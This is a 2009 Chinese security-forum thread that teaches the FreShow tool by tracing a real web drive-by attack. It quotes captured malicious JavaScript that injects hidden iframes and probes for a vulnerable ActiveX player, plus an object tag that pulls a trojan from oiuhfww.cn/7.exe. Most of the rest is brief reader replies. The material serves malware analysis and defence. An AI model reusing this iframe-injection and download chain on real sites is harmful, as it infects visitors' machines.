瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 通过实例讲解freshow使用方法
幸福耗子 - 2009-5-16 19:30:00
大家肯定看了网马解密大讲堂——网马解密中级篇(Freshow工具使用方法)  可能有部分人不会

请误点击下面任何网址,点击后果自负

那好下面我通过实例给大家讲解一下 请大家下载好freshow工具 打开跟我一起做

1.请大家打开freshow 在"url"输入http://ln.vnet.cn/ads.js 然后check
如果你打不开就复制下面代码到复制到"上操作区"(就是URL下面空白处)

var cookieString=document.cookie;
var start=cookieString.indexOf("cookiesleep");
if(start!=-1){}else{var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="cookiesleep=test;expires="+expires.toGMTString();
document.write("<iframe src=http://brrtydwsw.cn/07/0007.htm?22 width=100 height=0 border=0></iframe>");}


2.然后按filter,然后看见收集区域(最右面)里面多了一个网址http://brrtydwsw.cn/07/0007.htm?22
3.点击那个http://brrtydwsw.cn/07/0007.htm?22后 发现URL显示那个网址了,继续check
下面就显示代码



引用:

<script>
if(self.location==top.location)
{
location.href='http://www.google.cn';
}
</script>
<script language="javascript">
var now = new Date();
var miao =  now.getSeconds(); 
document.write("<iframe width=100 height=0 src=new.html><\/iframe>");
document.write("<BR>");
document.write("<\/BR>");
document.write("<BR>");
document.write("<\/BR>");
if (miao>50&&miao<100)
{
document.writeln("<script type=\"text\/javascript\" src=\"http:\/\/js.t0ngji.cn.yahoo.com\/1103014\/ystat.js\"><\/script><noscript><a href=\"http:\/\/tongji.cn.yahoo.com\"><img src=\"http:\/\/img.tongji.cn.yahoo.com\/1103014\/ystat.gif\"\/><\/a><\/noscript>");
}
else
{
document.writeln("<script type=\"text\/javascript\" src=\"http:\/\/js.tongji.cn.yahoo.com\/1103014\/ystat.js\"><\/script><noscript><a href=\"http:\/\/tongji.cn.yahoo.com\"><img src=\"http:\/\/img.tongji.cn.yahoo.com\/1103014\/ystat.gif\"\/><\/a><\/noscript>");
}
</script>



用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; CIBA; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; MAXTHON 2.0)
幸福耗子 - 2009-5-16 19:30:00
4.继续filter 右面收集区域又多了几个网址
5.点击http://brrtydwsw.cn/07/new.html 按check


引用:

<iframe src=ytqm.htm width=100 height=0></iframe>
<script src="js.js"></script>

6.继续fliter 点击http://brrtydwsw.cn/07/ytqm.htm 继续check


引用:

<html>
<head>
<meta http-equiv="Content-Type" c>
</head>
<body bgcolor="#FFFFFF" text="#000000">
<br>
<object classid="clsid:19EFFC12-25FB-479A-A0F2-1569AE1B3365" codebase="http://oiuhfww.cn/7.exe#version=1,0,0,002"  width="0" height="0">
</object>
</body>
</html>



在这里注意:http://oiuhfww.cn/7.exe 这个就是木马下载地址

把那个木马下载网址复制到右下方obj空白处 然后按insert 就ok了

好了  现在我把真正木马下载地址找到完毕后 就开始输出日志了

选中右面all前面的勾 然后按log钮


引用:


Log is generated by FreShow.
[wide]http://ln.vnet.cn/ads.js
    [frame]http://brrtydwsw.cn/07/0007.htm?22
        [frame]http://brrtydwsw.cn/07/new.html
            [frame]http://brrtydwsw.cn/07/ytqm.htm
                [object]http://oiuhfww.cn/7.exe
            [script]http://brrtydwsw.cn/07/js.js
        [script]http://brrtydwsw.cn/07/\"http:\/\/js.t0ngji.cn.yahoo.com\/1103014\/ystat.js\"
        [script]http://brrtydwsw.cn/07/\"http:\/\/js.tongji.cn.yahoo.com\/1103014\/ystat.js\"



再本贴下面回复中 粘贴一下 就看到日志了


出一道问题
那个挂马网址才解一半  你尝试继续解http://brrtydwsw.cn/07/js.js
可能考虑部分人打不开 源码在下面

if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=100 height=0 src=yt14.htm></iframe>");
document.write("<iframe width=100 height=0 src=ytfl.htm></iframe>");
document.write("<iframe width=100 height=0 src=ytff.htm></iframe>");
document.write("<iframe width=100 height=0 src=ytvod.htm></iframe>");
if(navigator.userAgent.toLowerCase().indexOf("msie 7")>0)
document.write("<iframe src=ytxxz.htm width=100 height=0></iframe>");
try{var m;
var of=new ActiveXObject("MPS"+".S"+"to"+"rm"+"Pl"+"ay"+"er.1");}
catch(m){};                     
finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0 src=ytbb.htm></iframe>");}}
document.write("<iframe width=100 height=0 src=yt122121.htm></iframe>");


他的木马下载地址是什么? 只要解出来一个就行 因为那里所有挂的都是一个木马下载地址

这个挂马方式没有采用任何加密  挂马网址清晰可见

答案在下面 回帖就能看见
***** 该内容需回复才可浏览 *****
於陵闲云 - 2009-5-16 19:56:00
前排听课
networkedition - 2009-5-16 20:02:00
不错的教程,加油继续呀:kaka1:
smallyou93 - 2009-5-16 20:03:00
:kaka1: 菜鸟学习中...
vistalong - 2009-5-16 20:18:00
进来看看
aaccbbdd - 2009-5-16 20:28:00
看看
竹本无ベ - 2009-5-17 13:17:00
温故而知新。
很好的教程,再次学习下。
yinziyang06078 - 2009-5-19 15:59:00
继续听课
happysunday2003 - 2009-5-19 23:17:00
加分顶起
badboyhhz - 2009-5-22 17:21:00
学习了  谢过
揍黑客 - 2009-5-24 9:01:00
进来学习,看之后的表情::kaka10:
candlelight - 2009-5-24 13:08:00
好文 支持
dos4276 - 2009-6-1 6:19:00
:kaka12:  向老师学习哈。 ^_^
Bearboy - 2009-6-3 15:04:00
听课
lichun005 - 2009-6-3 19:35:00
怎么都跑来卡卡了:kaka6:
chaojun - 2009-6-4 4:29:00
进来学习学习
hdcno2 - 2009-6-30 5:17:00
进来听课的,回复看看答案
fly百分百 - 2009-6-30 22:56:00
好东西
tswcbyy - 2009-7-1 16:02:00
教程不错,学习下。
gtyre2 - 2009-7-2 16:22:00
后排听下
呵呵
青歌 - 2009-7-11 9:36:00
:kaka2:
★蓝色羽毛★ - 2009-7-11 11:51:00
看看
zjmuye - 2009-7-12 2:12:00
看下答案是什么
lazybighead - 2009-7-14 14:59:00
前排听课
bobjiang6 - 2009-7-14 15:27:00
菜鸟学习中...
phoenixeagle - 2009-7-23 15:52:00
学习了:kaka1:
gdshow8384 - 2009-7-23 16:47:00
看看 
O(∩_∩)O哈!
Alice418 - 2009-7-24 16:42:00
每一步点check,第一次是NOTFOUND,接下来就FAILED ID..可以解释一下原因吗?
llzy3575 - 2009-7-25 12:23:00
呵呵
来学习下
123
查看完整版本: 通过实例讲解freshow使用方法